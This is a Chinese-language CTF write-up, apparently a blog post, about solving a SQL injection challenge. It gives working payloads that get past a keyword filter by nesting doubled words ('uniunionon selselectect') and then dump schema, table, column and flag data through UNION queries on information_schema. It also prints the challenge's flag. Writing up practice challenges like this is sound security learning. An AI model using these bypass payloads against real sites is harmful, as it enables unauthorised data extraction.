题目地址:题目
打开网站,看到了一个多老大的搜索框,题目是sql嘛,那就开始搜索一下试试。
甩给我一张这个。。。。
并没有什么收获,继续寻找注入点,F12看看源码吧。。。
发现一个疑似可以注入的链接,打开之。
第一次尝试,http://123.206.31.85:10018/list.php?id=1’
无回显,说明必定存在注入点,并且可能是 ’ 闭合
第二次尝试,http://123.206.31.85:10018/list.php?id=1’ --+ 回显正常,说明的确是 ’ 闭合
时间有点赶,我就不挨个配图了。。
第三次尝试,http://123.206.31.85:10018/list.php?id=1’ and 1=1–+, 回显空白 ,过滤了and
第四次尝试,http://123.206.31.85:10018/list.php?id=1’ And 1=1–+ ,回显空白 ,过滤了大小写
第五次尝试,http://123.206.31.85:10018/list.php?id=1’ anandd 1=1–+, 回显正常 ,好的,完美解决了,开始进行order by 试列数, 嵌套剥离绕过 过滤了and、or
开始尝试order by 1,2,3,4,5
经测试,3 回显正常
http://123.206.31.85:10018/list.php?id=1’ oorrder by 3–+ ,列数为3
爆数据库:
?id=-1' uniunionon selselectect 1,group_concat(schema_name),3 from infoorrmation_schema.schemata--+
得到:information_schema,web18.
爆表:
?id=-1' uniunionon selselectect 1,group_concat(table_name),3 from infoorrmation_schema.tables where table_schema='web18'--+
得到: ctf,flag.
爆列:
?id=-1' uniunionon selselectect 1,group_concat(column_name),3 from infoorrmation_schema.columns where table_name='flag'--+
得到:id,flag.
爆字段:
?id=-1' uniunionon selselectect 1,flag,3 from flag--+
flag{22b7a7c3d73d88050722b3eeb102ee45} .
解决OK,开始美好的晚饭了。。
9629
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
